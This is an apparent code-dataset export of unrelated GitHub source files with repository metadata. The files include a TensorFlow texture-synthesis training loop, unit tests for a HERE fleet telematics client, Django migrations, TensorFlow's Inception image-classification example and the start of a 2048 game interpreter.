# "--vgg_path=vgg/vgg16.tfmodel",
# "--save_dir=checkpoints", "--max_iter=200",
# "--save_interval=20", "--batch_size=1"])
print('input args:\n', json.dumps(vars(args), indent=4, separators=(',',':'))) # pretty print args
if not os.path.exists(args.save_dir):
os.makedirs(args.save_dir)
pickle.dump({'args':args}, open("%s/args.save"%args.save_dir, "wb"), 0)
#--------------------------------------------
# ## Set up the real-nvp generative model
rng = np.random.RandomState(args.seed)
tf.set_random_seed(args.seed)
obs_shape = (224,224,3) # size of the image to use
model_spec = real_nvp_model_spec
inv_model_spec = real_nvp_inv_model_spec
nn = real_nvp_nn
# create the model
model = tf.make_template('model', model_spec)
inv_model = tf.make_template('model', inv_model_spec, unique_name_='model')
# run once for data dependent initialization of parameters
z_init = tf.placeholder(tf.float32, shape=(args.init_batch_size,) + obs_shape)
gen_par = model(z_init)
#----------------------------------------------
# ## Use vgg network to set up the style loss
style_img_path = args.style_img_path
texture_image = tf.to_float(tf.constant(load_image(style_img_path).reshape((1, 224, 224, 3))))
z_sample = tf.placeholder(tf.float32, shape = (args.batch_size,) + obs_shape)
x, inv_jac = inv_model(z_sample)
image_vgg = VGGNetwork("image_vgg", tf.concat(0, [texture_image, x, x]),
1, args.batch_size, args.batch_size, args.vgg_path)
# constraint loss
con_loss_vec = image_vgg.style_loss([(i, 1) for i in range(1, 6)])
con_loss = tf.reduce_mean(con_loss_vec)
con_loss1 = tf.reduce_mean(con_loss_vec[:int(args.batch_size / 2)])
con_loss2 = tf.reduce_mean(con_loss_vec[int(args.batch_size / 2):])
#--------------------------------------
# ## Final loss is a combination of entropy and cost
# compute entropy
entropy = tf.reduce_mean(inv_jac) + tf.reduce_mean(tf.reduce_sum(z_sample ** 2 * 0.5 + np.log(2 * np.pi) * 0.5, [1,2,3]))
# loss is a combination of -entropy and constraint violation
c_augL = tf.placeholder(tf.float32, shape = [])
lam = tf.placeholder(tf.float32, shape = [])
cost = -entropy + lam * con_loss + c_augL / 2.0 * (con_loss ** 2)
# build the SGD optimizer
all_params = tf.trainable_variables()
cost_grad1 = tf.gradients(-entropy + lam * con_loss, all_params)
cost_grad2 = tf.gradients(con_loss1, all_params)
cost_grad = [i + c_augL * con_loss2 * j for i,j in zip(cost_grad1, cost_grad2)]
tf_lr = tf.placeholder(tf.float32, shape=[])
optimizer = nn.adam_updates(all_params, cost_grad, lr=tf_lr, mom1=0.95, mom2=0.9995)
#--------------------------------------
# ## Training
n_iter=0
ent_ls = []
con_ls = []
lam_use_ls = []
c_use_ls = []
initializer = tf.global_variables_initializer()
saver = tf.train.Saver()
print("Start training")
with tf.Session() as sess: # = tf.InteractiveSession()
sess.run(initializer) #, {z_init: np.random.normal(0.0, 1.0, (args.init_batch_size,) + obs_shape)})
feed_dict = { z_sample: np.random.normal(0.0, 1.0, (args.batch_size,) + obs_shape)}
hk = sess.run(con_loss, feed_dict)
c_use = 1e-9
gamma = 0.25
lam_use = 0.0
for i_augL in range(6):
print("augL iter %d, lam = %f, c = %f"%(i_augL, lam_use, c_use))
for i in range(args.max_iter):
feed_dict = { z_sample: np.random.normal(0.0, 1.0, (args.batch_size,) + obs_shape),
tf_lr:args.learning_rate, lam: lam_use, c_augL: c_use}
entropy_tmp, cost_con_tmp, _ = sess.run([entropy, con_loss, optimizer], feed_dict)
n_iter += 1
print("iter%d, entropy=%f, constraint=%f"%(n_iter, entropy_tmp, cost_con_tmp))
sys.stdout.flush()
con_ls.append(cost_con_tmp)
ent_ls.append(entropy_tmp)
lam_use_ls.append(lam_use)
c_use_ls.append(c_use)
if n_iter % args.save_interval == 0:
# ## save samples
x_sample_ls = []
for i_samp in range(10):
x_sample = sess.run(x, {z_sample: np.random.normal(0.0, 1.0, (args.batch_size,) + obs_shape)})
x_sample_ls.append(x_sample)
pickle.dump({'x_sample_ls':x_sample_ls}, open("%s/sample_%d.save"%(args.save_dir, n_iter), "wb"), 0)
saver.save(sess, "%s/params_%d.ckpt"%(args.save_dir, n_iter))
pickle.dump({'ent_ls': ent_ls, 'con_ls': con_ls, 'lam_use_ls': lam_use_ls}, open("%s/track.save"%args.save_dir , "wb"), 0)
#plt.imshow(x_sample[0,:,:,:], interpolation='none')
# updating
feed_dict = { z_sample: np.random.normal(0.0, 1.0, (args.batch_size,) + obs_shape)}
hk_new = sess.run(con_loss, feed_dict)
lam_use += c_use*hk_new
if np.linalg.norm(hk_new) > gamma*np.linalg.norm(hk):
c_use *= 4
hk = hk_new
| [
"noreply@github.com"
] | gabloa.noreply@github.com |
b7b81ee4c177b6e2d2700f4cd7c058e8943527a8 | 9e4f8dc4ca6ee60a30ab3138fa8a4787d7b20894 | /src/devng/adventofcode/day04/day04_test.py | 066e10e3aa86f8e8004e36cedaaf55f71f6c8818 | [] | no_license | devng/code-puzzles | 8eadbd454a73e97b22bae8449fb6f50d8f3a3e88 | 6052e5ec2b54a97a6a519ad08e11562be642b278 | refs/heads/master | 2021-01-10T12:00:59.211228 | 2020-04-20T19:04:41 | 2020-04-20T19:04:41 | 47,743,152 | 2 | 0 | null | 2015-12-17T12:40:45 | 2015-12-10T06:40:27 | Python | UTF-8 | Python | false | false | 833 | py | #!/usr/bin/env python
from day04 import *
import unittest
class Day04Test(unittest.TestCase):
def test_check_num(self):
b1 = check_num("abcdef", 609043)
self.assertTrue(b1)
b2 = check_num("abcdef", 609)
self.assertFalse(b2)
b3 = check_num("pqrstuv", 1048970)
self.assertTrue(b3)
b4 = check_num("pqrstuv", 104897)
self.assertFalse(b4)
b5 = check_num("iwrupvqb", 9958218, "000000")
self.assertTrue(b5)
def test_check_range(self):
n1 = check_range("abcdef", 609040, 609045)
self.assertEqual(n1, 609043)
n2 = check_range("abcdef")
self.assertEqual(n2, None)
n3 = check_range("iwrupvqb", 9958210, 10, "000000")
self.assertEqual(n3, 9958218)
if __name__ == "__main__":
unittest.main()
| [
"n.g.georgiev@gmail.com"
] | n.g.georgiev@gmail.com |
bea68a9dceb3f06bebb451ac472acfe6b03e99e5 | 8d4b737885446ccd40628d6a546a141d5e84e5b4 | /Topics/1_migrating_your_DNN_to_candle/migrated/cc_t29res.py | e70863dc52fe408f8b5d6d8a0220184510c86a3d | [
"MIT"
] | permissive | brettin/candle_tutorials | 3afabd6ba12a9ee2353bd5166d0d0278d79e28ef | 18315a41cf51cbcb267fb78a2e02ffe82d2fc42b | refs/heads/master | 2021-04-28T03:12:17.942290 | 2018-10-19T16:34:16 | 2018-10-19T16:34:16 | 122,134,363 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15 | py | ../cc_t29res.py | [
"rajeeja@gmail.com"
] | rajeeja@gmail.com |
2674d077dcd3e48cf5445537f600e6171777c48d | 3f7c4de996894d83f0e999ab9e60302be5ab195f | /tests/test_fleet_telematics_api.py | 08355ed115f5e5d2e7b808128cec81a2981e98ee | [
"MIT"
] | permissive | tungson-pm/HerePy | 3f18ffddd181434c63f94abe67844c0fcb02747d | a9e2797f251ff157cf89cfae7c1605833bfee75f | refs/heads/master | 2022-12-25T06:08:21.880054 | 2020-10-05T19:54:51 | 2020-10-05T19:54:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,376 | py | #!/usr/bin/env python
import os
import time
import unittest
import json
import responses
import herepy
class FleetTelematicsApiTest(unittest.TestCase):
def setUp(self):
api = herepy.FleetTelematicsApi('api_key')
self._api = api
def test_initiation(self):
self.assertIsInstance(self._api, herepy.FleetTelematicsApi)
self.assertEqual(self._api._api_key, 'api_key')
self.assertEqual(self._api._base_url, 'https://wse.ls.hereapi.com/2/')
@responses.activate
def test_find_sequence_whensucceed(self):
with open('testdata/models/fleet_telematics_find_sequence.json', 'r') as f:
expected_response = f.read()
responses.add(responses.GET, 'https://wse.ls.hereapi.com/2/findsequence.json',
expected_response, status=200)
start = str.format('{0};{1},{2}', 'WiesbadenCentralStation', 50.0715, 8.2434)
intermediate_destinations = [str.format('{0};{1},{2}', 'FranfurtCentralStation', 50.1073, 8.6647),
str.format('{0};{1},{2}', 'DarmstadtCentralStation', 49.8728, 8.6326),
str.format('{0};{1},{2}', 'FrankfurtAirport', 50.0505, 8.5698)]
end = str.format('{0};{1},{2}', 'MainzCentralStation', 50.0021, 8.259)
modes = [herepy.RouteMode.fastest, herepy.RouteMode.car, herepy.RouteMode.traffic_enabled]
response = self._api.find_sequence(start=start,
departure='2014-12-09T09:30:00%2b01:00',
intermediate_destinations=intermediate_destinations,
end=end,
modes=modes)
self.assertTrue(response)
self.assertIsInstance(response, herepy.WaypointSequenceResponse)
@responses.activate
def test_find_sequence_whenerroroccured(self):
with open('testdata/models/fleet_telematics_unauthorized_error.json', 'r') as f:
expected_response = f.read()
responses.add(responses.GET, 'https://wse.ls.hereapi.com/2/findsequence.json',
expected_response, status=200)
start = str.format('{0};{1},{2}', 'WiesbadenCentralStation', 50.0715, 8.2434)
intermediate_destinations = [str.format('{0};{1},{2}', 'FranfurtCentralStation', 50.1073, 8.6647),
str.format('{0};{1},{2}', 'DarmstadtCentralStation', 49.8728, 8.6326),
str.format('{0};{1},{2}', 'FrankfurtAirport', 50.0505, 8.5698)]
end = str.format('{0};{1},{2}', 'MainzCentralStation', 50.0021, 8.259)
modes = [herepy.RouteMode.fastest, herepy.RouteMode.car, herepy.RouteMode.traffic_enabled]
with self.assertRaises(herepy.HEREError):
self._api.find_sequence(start=start,
departure='2014-12-09T09:30:00%2b01:00',
intermediate_destinations=intermediate_destinations,
end=end,
modes=modes)
@responses.activate
def test_find_pickups_whensucceed(self):
with open('testdata/models/fleet_telematics_find_pickups.json', 'r') as f:
expected_response = f.read()
responses.add(responses.GET, 'https://wse.ls.hereapi.com/2/findpickups.json',
expected_response, status=200)
modes = [herepy.RouteMode.fastest, herepy.RouteMode.car, herepy.RouteMode.traffic_enabled]
start = str.format('{0},{1};{2}:{3},value:{4}', 50.115620,
8.631210, herepy.MultiplePickupOfferType.pickup.__str__(),
'GRAPEFRUITS', 1000)
departure = '2016-10-14T07:30:00+02:00'
capacity = 10000
vehicle_cost = 0.29
driver_cost = 20
max_detour = 60
rest_times = 'disabled'
intermediate_destinations = [str.format('{0},{1};{2}:{3},value:{4}', 50.118578,
8.636551, herepy.MultiplePickupOfferType.drop.__str__(),
'APPLES', 30),
str.format('{0},{1};{2}:{3}', 50.122540, 8.631070,
herepy.MultiplePickupOfferType.pickup.__str__(), 'BANANAS')]
end = str.format('{1},{2}', 'MainzCentralStation', 50.132540, 8.649280)
response = self._api.find_pickups(modes=modes,
start=start,
departure=departure,
capacity=capacity,
vehicle_cost=vehicle_cost,
driver_cost=driver_cost,
max_detour=max_detour,
rest_times=rest_times,
intermediate_destinations=intermediate_destinations,
end=end)
self.assertTrue(response)
self.assertIsInstance(response, herepy.WaypointSequenceResponse)
@responses.activate
def test_find_pickups_whenerroroccured(self):
with open('testdata/models/fleet_telematics_unauthorized_error.json', 'r') as f:
expected_response = f.read()
responses.add(responses.GET, 'https://wse.ls.hereapi.com/2/findpickups.json',
expected_response, status=200)
modes = [herepy.RouteMode.fastest, herepy.RouteMode.car, herepy.RouteMode.traffic_enabled]
start = str.format('{0},{1};{2}:{3},value:{4}', 50.115620,
8.631210, herepy.MultiplePickupOfferType.pickup.__str__(),
'GRAPEFRUITS', 1000)
departure = '2016-10-14T07:30:00+02:00'
capacity = 10000
vehicle_cost = 0.29
driver_cost = 20
max_detour = 60
rest_times = 'disabled'
intermediate_destinations = [str.format('{0},{1};{2}:{3},value:{4}', 50.118578,
8.636551, herepy.MultiplePickupOfferType.drop.__str__(),
'APPLES', 30),
str.format('{0},{1};{2}:{3}', 50.122540, 8.631070,
herepy.MultiplePickupOfferType.pickup.__str__(), 'BANANAS')]
end = str.format('{1},{2}', 'MainzCentralStation', 50.132540, 8.649280)
with self.assertRaises(herepy.HEREError):
self._api.find_pickups(modes=modes,
start=start,
departure=departure,
capacity=capacity,
vehicle_cost=vehicle_cost,
driver_cost=driver_cost,
max_detour=max_detour,
rest_times=rest_times,
intermediate_destinations=intermediate_destinations,
end=end)
| [
"abdullahselek@gmail.com"
] | abdullahselek@gmail.com |
0f8cf966aae1157f8e50d5b1881785a10dc5234f | 0e828ab12c61d98e9c4b6d8418efe1f6130cf3db | /src/utilities/local/metadata_appender.py | 8665a65d8637bae82be5aed26a788f1f076eb990 | [] | no_license | chrisioa/sensiot_nsq | 60b220ad0bb4b4e70a60b90e6687119f9729a0e6 | df68cd8c4597654280f55edfd21ded9f0af085dd | refs/heads/master | 2020-04-20T06:12:08.016503 | 2019-02-01T15:59:45 | 2019-02-01T15:59:45 | 168,676,224 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | import json
import logging
import os
import threading
from queue import Queue
from utilities.local.meta.data import SensorData
logger = logging.LoggerAdapter(logging.getLogger("sensiot"), {"class": os.path.basename(__file__)})
class MetaDataAppender(threading.Thread):
def __init__(self, name, event, input_queue, output_queue, config):
super(MetaDataAppender, self).__init__()
self.name = name
self.event = event
self.config = config
self.input_queue = input_queue
self.output_queue = output_queue
self.hostname = self.__get_hostname("/etc/hostname")
self.device_id = self.config['meta']['device_id']
self.building = self.config['location']['building']
self.room = self.config['location']['room']
logger.info("{} initialized successfully".format(self.name))
def run(self):
logger.info("Started {}".format(self.name))
while not self.event.is_set():
self.event.wait(2)
while not self.input_queue.empty():
raw = self.input_queue.get()
logger.info("Raw data received")
deserialized_data = json.loads(raw.replace("'", '"'))
converted_data = self.__convert(deserialized_data)
serialized_data = converted_data.to_json()
self.output_queue.put(serialized_data)
##### FUNCTION CALL HERE #####
logger.info("Data put in queue")
logger.info("Stopped: {}".format(self.name))
def __get_hostname(self, path):
if os.path.isfile(path):
with open(path) as file:
return file.readline().strip()
else:
logger.error("Unable to locate {} for hostname".format(path))
return "unspecified"
def __convert(self, data):
return SensorData(self.hostname,
self.device_id,
self.building,
self.room,
data)
| [
"christos.ioannidis@stud.uni-bamberg.de"
] | christos.ioannidis@stud.uni-bamberg.de |
5c9294596c8b7541d47e59cdd745759a227a0016 | 0fc891df6703ce3f91fe6005a6c582e573ed6c13 | /CWMT/user_login/migrations/0014_auto_20170811_1310.py | 95bd102bb078e1dc0a79ceb9075876bc60596027 | [] | no_license | Zeco-01/CWMT2017-REG | ce155343575d3b8b49eda584b40bdd1716368e38 | 5e71ddc38f3020d1582d0b38f2f8d0eace615b88 | refs/heads/master | 2021-01-02T22:19:25.372629 | 2017-09-18T06:46:11 | 2017-09-18T06:46:11 | 99,318,036 | 1 | 1 | null | 2017-08-11T15:17:24 | 2017-08-04T07:47:43 | Python | UTF-8 | Python | false | false | 568 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-11 13:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user_login', '0013_auto_20170811_1306'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='enter_date',
),
migrations.AddField(
model_name='user',
name='in_date',
field=models.CharField(max_length=100, null=True),
),
]
| [
"leezehua@outlook.com"
] | leezehua@outlook.com |
a85cc8cf2b49e89ca79b5d93c0af0d7e1dcec4ee | c55083d8a23a9d093b677066a5a827634c09357b | /chstrings/__init__.py | 39796432eff779705b6f260f03ae6661e1d07d2b | [
"MIT"
] | permissive | earwig/citationhunt | 211a44c7bdb67e675872ca44aeae982d33fcf359 | b6084d2958989c9082db7a8d4556a4e51b78bdb3 | refs/heads/master | 2021-01-15T16:11:11.563650 | 2016-07-21T11:08:43 | 2016-07-21T11:08:43 | 62,332,946 | 1 | 0 | null | 2016-06-30T18:16:46 | 2016-06-30T18:16:46 | null | UTF-8 | Python | false | false | 1,902 | py | import flask
import os
import json
def _preprocess_variables(config, strings):
in_page_link = flask.Markup(
'<a target="_blank" href=%s>%s</a>')
strings['in_page'] = \
flask.Markup(strings['in_page']) % in_page_link
if config.lead_section_policy_link:
lead_section_policy_link = flask.Markup(
'<a target="_blank" href=%s>%s</a>') % (
config.lead_section_policy_link,
config.lead_section_policy_link_title)
strings['lead_section_hint'] = \
flask.Markup(strings['lead_section_hint']) % \
lead_section_policy_link
else:
strings['lead_section_hint'] = ''
beginners_hint_link = flask.Markup(
'<a target="_blank" href=%s>%s</a>') % (
config.beginners_link,
config.beginners_link_title)
strings['beginners_hint'] = \
flask.Markup(strings['beginners_hint']) % beginners_hint_link
if '404' not in config.flagged_off:
page_not_found_link = flask.Markup('<a href=%s>Citation Hunt</a>') % (
config.lang_code)
strings['page_not_found_text'] = \
flask.Markup(strings['page_not_found_text']) % page_not_found_link
strings.setdefault('instructions_goal', '')
strings.setdefault('instructions_details', '')
if strings['instructions_details']:
strings['instructions_details'] = flask.Markup(
strings['instructions_details']) % (
flask.Markup('<b>' + strings['button_wikilink'] + '</b>'),
flask.Markup('<b>' + strings['button_next'] + '</b>'),
beginners_hint_link)
return strings
def get_localized_strings(config, lang_code):
strings_dir = os.path.dirname(__file__)
strings = json.load(file(os.path.join(strings_dir, lang_code + '.json')))
return _preprocess_variables(config, strings)
| [
"guilherme.p.gonc@gmail.com"
] | guilherme.p.gonc@gmail.com |
88947f254667961bbc58029408578caa53ee40e6 | ad2b21450f3e13fcc1a552b52cf16dc9c4667bf1 | /mysite/mysite/urls.py | d3d09581af7ddbde74a1462b6d0b8982dbdb0760 | [] | no_license | masummist/django- | dcdb9d29ac43be0369013999d3d5742d7a1218ff | e727941f74ca6ca0b8238bdc1bda96b4464b4587 | refs/heads/master | 2020-05-20T11:56:32.490328 | 2012-11-11T17:36:15 | 2012-11-11T17:36:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,199 | py | from django.conf.urls import *
from django.contrib import admin
##admin.autodiscover()
##from mysite.book import views
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
(r'^$', 'blog.views.index'),
url(
r'^blog/views/(?P<slug>[^\.]+).html',
'blog.views.view_post',
name='view_blog_post'),
url(
r'^blog/category/(?P<slug>[^\.]+).html',
'blog.views.view_category',
name='view_blog_category'),
## (r'^search-form/$', views.search_form),
## (r'^search/$', views.search),
##
# Examples:
# url(r'^$', 'mysite.views.home', name='home'),
# url(r'^mysite/', include('mysite.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
)
| [
"mm200716024@gmail.com"
] | mm200716024@gmail.com |
d6a3abae49cb2cd634fa86b7f02cb8cb1d23251b | c4b4d340558d31b5bcf91695fffec19718f4ff2b | /05二叉树/001二叉树深度.py | 7ef4ea5b4f51bc7cd96cd91f59bca53fffadbdee | [] | no_license | sjtupig/algorithm | 4b334aa7f9319e644979fac0b9f506b4861b99ed | 7ecf1336348fa3dfc4a4d579b50493b268e5ec26 | refs/heads/master | 2020-04-30T05:31:25.343633 | 2019-03-22T02:38:37 | 2019-03-22T02:38:37 | 176,628,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | class TreeNode(object):
"""docstring for TreeNode"""
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def TreeDepth(self, pRoot):
# write code here
if not pRoot:return 0
return max(self.TreeDepth(pRoot.left),self.TreeDepth(pRoot.right))+1 | [
"noreply@github.com"
] | sjtupig.noreply@github.com |
db275d091a8f3f15fa4d61d6e285bc93fe0b803a | 17e7928e6b6d335e121b2b863d5c878b2e9b9e6e | /classify_image.py | 9df435ab3af26eca749d282759c7a274c09b6ac2 | [] | no_license | alexpadraic/auto-trash | 0b1748666222ab8974f4d760ca31823f36cb6343 | 53a23d5fcf2daffd2c362c9a245d8b72da869a59 | refs/heads/development | 2021-01-12T17:48:05.674854 | 2020-09-09T16:20:46 | 2020-09-09T16:20:46 | 69,391,095 | 9 | 1 | null | 2016-09-27T19:53:00 | 2016-09-27T19:26:51 | Python | UTF-8 | Python | false | false | 7,995 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple image classification with Inception.
Run image classification with Inception trained on ImageNet 2012 Challenge data
set.
This program creates a graph from a saved GraphDef protocol buffer,
and runs inference on an input JPEG image. It outputs human readable
strings of the top 5 predictions along with their probabilities.
Change the --image_file argument to any jpg image to compute a
classification of that image.
Please see the tutorial and website for a detailed description of how
to use this script to perform image recognition.
https://tensorflow.org/tutorials/image_recognition/
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import re
import sys
import tarfile
import operator
import numpy as np
from six.moves import urllib
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
# classify_image_graph_def.pb:
# Binary representation of the GraphDef protocol buffer.
# imagenet_synset_to_human_label_map.txt:
# Map from synset ID to a human readable string.
# imagenet_2012_challenge_label_map_proto.pbtxt:
# Text representation of a protocol buffer mapping a label to synset ID.
tf.app.flags.DEFINE_string(
'model_dir', '/home/pi/cerberus/imagenet',
"""Path to classify_image_graph_def.pb, """
"""imagenet_synset_to_human_label_map.txt, and """
"""imagenet_2012_challenge_label_map_proto.pbtxt.""")
tf.app.flags.DEFINE_string('image_file', '',
"""Absolute path to image file.""")
tf.app.flags.DEFINE_integer('num_top_predictions', 5,
"""Display this many predictions.""")
# pylint: disable=line-too-long
DATA_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'
# pylint: enable=line-too-long
class NodeLookup():
"""Converts integer node ID's to human readable labels."""
def __init__(self,
label_lookup_path=None,
uid_lookup_path=None):
if not label_lookup_path:
label_lookup_path = os.path.join(
FLAGS.model_dir, 'imagenet_2012_challenge_label_map_proto.pbtxt')
if not uid_lookup_path:
uid_lookup_path = os.path.join(
FLAGS.model_dir, 'imagenet_synset_to_human_label_map.txt')
self.node_lookup = self.load(label_lookup_path, uid_lookup_path)
def load(self, label_lookup_path, uid_lookup_path):
"""Loads a human readable English name for each softmax node.
Args:
label_lookup_path: string UID to integer node ID.
uid_lookup_path: string UID to human-readable string.
Returns:
dict from integer node ID to human-readable string.
"""
if not tf.gfile.Exists(uid_lookup_path):
tf.logging.fatal('File does not exist %s', uid_lookup_path)
if not tf.gfile.Exists(label_lookup_path):
tf.logging.fatal('File does not exist %s', label_lookup_path)
# Loads mapping from string UID to human-readable string
proto_as_ascii_lines = tf.gfile.GFile(uid_lookup_path).readlines()
uid_to_human = {}
p = re.compile(r'[n\d]*[ \S,]*')
for line in proto_as_ascii_lines:
parsed_items = p.findall(line)
uid = parsed_items[0]
human_string = parsed_items[2]
uid_to_human[uid] = human_string
# Loads mapping from string UID to integer node ID.
node_id_to_uid = {}
proto_as_ascii = tf.gfile.GFile(label_lookup_path).readlines()
for line in proto_as_ascii:
if line.startswith(' target_class:'):
target_class = int(line.split(': ')[1])
if line.startswith(' target_class_string:'):
target_class_string = line.split(': ')[1]
node_id_to_uid[target_class] = target_class_string[1:-2]
# Loads the final mapping of integer node ID to human-readable string
node_id_to_name = {}
for key, val in node_id_to_uid.items():
if val not in uid_to_human:
tf.logging.fatal('Failed to locate: %s', val)
name = uid_to_human[val]
node_id_to_name[key] = name
return node_id_to_name
def id_to_string(self, node_id):
if node_id not in self.node_lookup:
return ''
return self.node_lookup[node_id]
def create_graph():
"""Creates a graph from saved GraphDef file and returns a saver."""
# Creates graph from saved graph_def.pb.
with tf.gfile.FastGFile(os.path.join(
FLAGS.model_dir, 'classify_image_graph_def.pb'), 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='')
def run_inference_on_image(image):
"""Runs inference on an image.
Args:
image: Image file name.
Returns:
Nothing
"""
if not tf.gfile.Exists(image):
tf.logging.fatal('File does not exist %s', image)
image_data = tf.gfile.FastGFile(image, 'rb').read()
# Creates graph from saved GraphDef.
create_graph()
with tf.Session() as sess:
# Some useful tensors:
# 'softmax:0': A tensor containing the normalized prediction across
# 1000 labels.
# 'pool_3:0': A tensor containing the next-to-last layer containing 2048
# float description of the image.
# 'DecodeJpeg/contents:0': A tensor containing a string providing JPEG
# encoding of the image.
# Runs the softmax tensor by feeding the image_data as input to the graph.
softmax_tensor = sess.graph.get_tensor_by_name('softmax:0')
predictions = sess.run(softmax_tensor,
{'DecodeJpeg/contents:0': image_data})
predictions = np.squeeze(predictions)
# Creates node ID --> English string lookup.
node_lookup = NodeLookup()
predictions_and_scores = {}
top_k = predictions.argsort()[-FLAGS.num_top_predictions:][::-1]
for node_id in top_k:
human_string = node_lookup.id_to_string(node_id)
score = predictions[node_id]
# print(top_k)
# print('%s (score = %.5f)' % (human_string, score))
predictions_and_scores[human_string] = score
sorted_predictions_and_scores = sorted(predictions_and_scores.items(), key=operator.itemgetter(1))
# print(sorted_predictions_and_scores)
return sorted_predictions_and_scores
# Don't need necessarily need this method so long as we include the inception model with the program
# package
def maybe_download_and_extract():
"""Download and extract model tar file."""
dest_directory = FLAGS.model_dir
if not os.path.exists(dest_directory):
os.makedirs(dest_directory)
filename = DATA_URL.split('/')[-1]
filepath = os.path.join(dest_directory, filename)
if not os.path.exists(filepath):
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %s %.1f%%' % (
filename, float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
filepath, _ = urllib.request.urlretrieve(DATA_URL, filepath, _progress)
print()
statinfo = os.stat(filepath)
print('Succesfully downloaded', filename, statinfo.st_size, 'bytes.')
tarfile.open(filepath, 'r:gz').extractall(dest_directory)
# ********** main function
# def main(_):
# maybe_download_and_extract()
# image = (FLAGS.image_file if FLAGS.image_file else
# os.path.join(FLAGS.model_dir, 'cropped_panda.jpg'))
# run_inference_on_image(image)
# if __name__ == '__main__':
# tf.app.run()
| [
"raj7desai@gmail.com"
] | raj7desai@gmail.com |
8f0012d44f36e196f592191ec42d324b90aefd4c | 164711270ae7320796890f90aeca688c27380f96 | /website/setup.py | 1871c41a68c6cf0a6990f97991c570a81f92d8dc | [] | no_license | runephilosof/aichallenge | 2a5e90ae89af1ca9c47dc9efd940524c10ec5f20 | ccd1e50b5a52eb90a81fddc29a2b4478e0c07ab0 | refs/heads/epsilon | 2023-04-05T01:37:58.913002 | 2021-04-06T09:38:58 | 2021-04-06T09:38:58 | 349,961,829 | 0 | 0 | null | 2021-03-21T10:29:58 | 2021-03-21T10:15:14 | null | UTF-8 | Python | false | false | 1,258 | py | #!/usr/bin/env python
import glob
import re
import os
def replaceMarkdown():
competition="Ants"
seewikiregex=re.compile(r'(<!--<MarkdownReplacement with="([^\n>]*.md)">-->.*?<!--</MarkdownReplacement>-->)',re.DOTALL)
markdownlocation = "aichallenge.wiki/"
for page in glob.iglob("*.php"):
try:
pagecontent=open(page,"r").read()
matches=(match.groups() for match in seewikiregex.finditer(pagecontent))
for toreplace, markdownfilename in matches:
realmarkdownfilename=markdownfilename.replace("competition",competition)
print "Inserting `%s` into `%s`, where `%s...` was." % (realmarkdownfilename,page,toreplace[:90])
compiledmarkdown=os.popen("python md.py %s" % markdownlocation+realmarkdownfilename).read()
compiledmarkdown='<!--<MarkdownReplacement with="%s">-->%s<!--</MarkdownReplacement>-->' % (markdownfilename,compiledmarkdown)
pagecontent=pagecontent.replace(toreplace,compiledmarkdown)
open(page,"w").write(pagecontent)
except IOError:
print "Ignoring `%s` because of errors" % (page)
def setup():
replaceMarkdown()
if __name__=="__main__":
setup() | [
"alex@hypertriangle.com"
] | alex@hypertriangle.com |
58ab631f8cfd89a1a2391594b2cd854b8a1cea02 | 1c80736a61d76d0e17f2a08dbf2d7730b71b278f | /game.py | aaccb40b8fb3520971e632312281b43d29a84a09 | [
"MIT"
] | permissive | someshsingh22/2048-Language | fc9a0c50bcafa67683b1410ac588960cac29a6db | ca8f5280d748876adb614c39f628b2d4db7d247d | refs/heads/main | 2023-08-17T13:55:01.391712 | 2021-09-25T18:35:08 | 2021-09-25T18:35:08 | 356,891,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,753 | py | import random
import re
from copy import deepcopy
import sys
from itertools import product
from errors import (
WrongIndex,
IdentifierExists,
EmptyTileNamingException,
EmptyTileQueryException,
)
class Tile:
"""
The tiles used for the 2048 Board, contains the list of assignments mapped and value of the tile
parameters:
value: the value present in the tile currently
variables: list of variables mapped currently
index: refers to the location of tile in the matrix
"""
def __init__(self, index):
super().__init__()
self.value = 0
self.index = index
self.variables = list()
def re_index(self, index):
"""
Update index of tile after move
"""
self.index = index
def __repr__(self):
return "%4d " % self.value if self.value > 0 else " " * 5
class Board:
"""
The 2048 Game Engine, takes commands from the translator and executes
Parameters:
size: 2-tuple of number of rows and columns
variables:
rows, columns: The limit for number of rows/columns
matrix: 2D Array for keeping track of tiles
fmap: function maps that maps strings that refers to the member functions of the class
"""
def __init__(self, size=(4, 4)):
self.rows, self.columns = size
self.matrix = self.empty_matrix()
self.add_random_tile()
self.add_random_tile()
self.fmap = {
"NAME": self.name,
"ASSIGN": self.assign,
"QUERY": self.query,
"MOVE": self.move,
}
print("\033[32m2048 >>> Welcome to the 2048 Gaming Language \033[0m")
self.choice()
print("\033[32m2048 >>> Below is the Board. Happy Coding! \033[0m")
print(self)
def choice(self):
print(
"\033[34mOn subtracting left what should the output be in this case \033[0m"
)
option_row = [Tile((0, 0)) for i in range(4)]
option_row[0].value = 4
option_row[1].value = 2
option_row[2].value = 2
option_row[3].value = 4
